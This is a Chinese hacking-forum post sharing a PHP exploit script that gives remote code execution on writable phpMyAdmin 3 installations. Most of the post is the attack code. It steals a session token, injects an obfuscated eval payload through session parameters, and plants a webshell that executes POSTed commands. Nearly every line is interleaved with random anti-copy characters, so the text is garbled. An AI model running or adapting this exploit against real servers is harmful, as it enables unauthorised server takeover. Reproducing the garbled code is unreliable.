找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2009|回复: 0
打印 上一主题 下一主题

phpadmin3 remote code execute php版本exploit

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-21 09:13:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。& k+ j! {4 N) u

2 n. ?5 X) q6 C* _" q5 a- T- o; S% \昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。7 d  {* L  ~, z* H
! S  R$ H* Z( A3 `5 h
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
9 P3 `6 D: s3 Z" D一是session.auto_start = 1;# H( o5 a! Y; L2 _1 |* [% _6 B; W$ n- c! ~
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
) B! M0 w  [+ J3 s当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。  ]; a1 L; {! g" A& ]# u  l9 |
, M4 x' n: C1 U" i( l# j( z' `+ Y2 c
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
' z4 N) i# @9 }8 m, M2 T
& a+ c( t+ N1 T" e于是写了这个php版本的exp,代码如下:
7 J* }, V& y- v( M: Q" {( w: s* S4 I' D3 S- s4 b" D) |( d
#!/usr/bin/php
9 {6 V# d0 K  x# W3 W<?php  [7 W' O% ?9 `% \$ P
print_r('" I0 Y8 \/ @6 ~5 _4 k- \
+---------------------------------------------------------------------------+- o& u6 p2 w+ M# P! `+ P2 X1 U
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
$ w% h& }& z" G8 uby oldjun(www.oldjun.com)
. [- v) I: ]8 q$ t# M2 J2 y! Lwelcome to www.t00ls.net
7 n' {+ S0 o8 Pmail: oldjun@gmail.com
9 g( j0 _( Y. rAssigned CVE id: CVE-2011-25057 L- S" a8 M) W% `  M* ~
+---------------------------------------------------------------------------+
. b4 O. T/ W: y6 U1 G! h');
  Y% {+ v: M/ F' A7 c6 M' W7 O/ U" n
/**
  O6 Q8 O+ g# }+ C( E) \' j# g * working when the directory:"config" exists and is writeable., p3 S1 f. h) B/ c# a
**/. I9 B4 I9 u# b5 w
: K- l5 N# @0 F  Y5 `2 p
if ($argc < 3) {
! T' m9 D7 q# U$ @  L, S# |" u6 T' `    print_r('
+ M. @% k/ I1 f, m" X+---------------------------------------------------------------------------+
6 t/ k8 F9 Q7 {7 O2 O( w9 mUsage: php '.$argv[0].' host path
3 E1 H2 Z# ~/ ]5 k( c" E4 g: W5 Y, Whost:      target server (ip/hostname)
) f- c5 F5 }; i  T7 wpath:      path to pma3% W! U% t! x5 b( [8 A% \* J8 a3 Y
Example:/ G, B1 }7 L4 H
php '.$argv[0].' localhost /pma/
5 z, @* d7 {0 y7 v) u+---------------------------------------------------------------------------+
3 b7 a, w: p1 a5 d');
3 l& J1 ~4 p, V) I3 {    exit;. R& Y) H" A! w5 o8 {
}. q8 ~; m0 I5 L0 e' w

! z! G" S( w+ L4 t. d3 M$host = $argv[1];. w, p7 k. M+ _) R( L& ~
$path = $argv[2];$ }3 R. V( Z4 [7 }
' Z7 a& c* n# b4 ^! V6 }
/**( v& K- Q; S! n8 H  ?4 M8 i7 ~! B
* Try to determine if the directory:"config" exists. @( G" e4 ^! I! e! E" `
**/
$ L! Z% X. g0 i& Yecho "[+] Try to determine if the directory:config exists....\n";5 l% K  B6 }2 [+ t. I8 i4 h4 y
$returnstr=php_request('config/');* S0 t- ~% l9 ^2 D' ~4 a! m
if(strpos($returnstr,'404')){
- J$ r  }3 q+ c" W    exit("[-] Exploit Failed! The directory:config do not exists!\n");  n, N" b: a8 S. m) b
}
) Q' ]$ \6 w+ m# H" u/ p
! d8 P- v% m; ~: [5 q/**
( w- E9 v/ I% N% y$ @  k * Try to get token and sessionid
9 f/ N4 c6 n7 m. ~, d% @& w**/+ b# i* k; \! `) |9 ~( }& A  g3 w# g! f
echo "[+] Try to get token and sessionid....\n";
8 ?: S  O. X4 n" `. U1 p$result=php_request('index.php');
* c/ Q$ B- f, [2 \  Mpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
3 y' y, ^' c" w% ]& W9 d$token=$resp[3];% d: a6 L' ^) M- _
$sessionid=$resp[1];( v( e% z: r5 O/ R
if($token && $sessionid){
/ q. I7 M* p# N! G4 |% `    echo "[+] tokentoken\n";, ~' c) k3 y3 a: G4 O- j4 R
    echo "[+] Session IDsessionid\n";: m; E5 z; {+ X) r/ ^5 m# ^+ G
}else{+ r# M9 O0 J$ e' I3 }& k1 H- h: \
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");* R- s" C3 l  |% [5 d6 l  M% k; Q
}
0 P& P4 }( s" i  m; `9 {9 P- a/ d! M, w4 l9 ^9 x
/**/ U- @3 B% I+ @% \3 I% s
* Try to insert shell into session
) B: n2 S3 i3 I**/: f9 _" z3 P, Y1 b% v
echo "[+] Try to insert shell into session....\n";
6 Y7 Y2 @4 [+ Y) P* q: I, lphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.. ^3 i. d7 H9 ]

9 ]5 R% L. x5 P" X/**
" i& m8 o  O, _! ^. g3 o+ y * Try to create webshell" k( Y" F2 o/ {. z+ @& i% u
**/
: G/ |  a2 A6 n3 f$ M* Q' |' r: xecho "[+] Try to create webshell....\n";0 W# T5 Q$ f% ~8 W
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
8 ^. {1 T4 v3 k  E/**; F2 t+ w9 Q; p8 ~7 S
* Try to check if the webshell was created successfully
5 \# ~% r7 p8 ?; Q! K4 l( F**/
) J2 E9 F/ [& U8 T9 lecho "[+] Try to check if the webshell was created successfully....\n";
- q# \1 z* p4 l' t" a$content=php_request('config/config.inc.php');& u1 F5 \1 S5 E" B
if(strpos($content,'t00ls')){
. W5 s7 x$ ?" q    echo "[+] Congratulations! Expoilt successfully....\n";8 j" M% z6 H  }4 d, _6 q4 ]6 H- P* b
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
* z9 _8 U: q6 g# u3 O}else{
, N2 t" [& \+ S- @    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
: d& }4 I% w  v( T" f}( O6 W9 c( G& d5 u5 g4 }- B( [
4 N' a9 q- ~9 Q  @  M
function php_request($url,$data='',$cookie=''){0 X2 j& z4 D- c( o0 h* K! v) c: \. o
    global  $host, $path;) {- m$ p; V& V- d. E3 \
    1 `0 k, ]  I& F  [5 h
    $method=$data?'POST':'GET';2 l0 X1 k4 V8 q9 O/ A" @; Y% t$ u
    ) X0 H2 R; ~" F/ L: Q/ W% T5 O$ Z8 w
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
4 J/ T4 Y6 _" M    $packet .= "Accept: */*\r\n";" b8 y6 e  @1 c9 J6 U* p
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
+ v9 S0 c& t$ s' m9 Z" e    $packet .= "Host: $host\r\n";
7 D7 h1 R  P9 f    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";1 @6 q& j$ R5 ]$ ~# F  L
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";3 m; A2 F# {1 a9 U
    $packet .= $cookie?"Cookie: $cookie\r\n":"";& g- p8 b/ l7 E
    $packet .= "Connection: Close\r\n\r\n";# R: w% J4 R& s
    $packet .= $data?$data:"";
+ O  o" e4 o8 A# ^8 Q9 O6 o: E! [  r& `) U8 E
    $fp = fsockopen(gethostbyname($host), 80);# K* Y3 ~5 H0 H
    if (!$fp) {
' u4 I2 `" ~( h6 }1 v- p    echo 'No response from '.$host; die;2 R+ y- x9 x* N. f
    }! e, H  \$ [' X' o/ E
    fputs($fp, $packet);
- `. a/ E! \3 C
3 E" t; }- a2 @0 {! h    $resp = '';
8 q, m8 ~& s4 ]; I8 Y2 _2 u2 \2 _& X* F/ p/ p3 ~8 q
    while ($fp && !feof($fp))5 G  [+ H8 F" ^+ ?: g. h& s: L
        $resp .= fread($fp, 1024);* {+ |3 A1 C; k7 W- r1 u
. A+ x  F, A) e- y  y$ P+ @# \) g
    return $resp;; V- y% q2 a$ a' p: [
}0 M# R/ o$ R5 @) X9 A
   
* I9 v, r; d% N9 ??>
% X7 s: D6 x. k6 x2 j.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表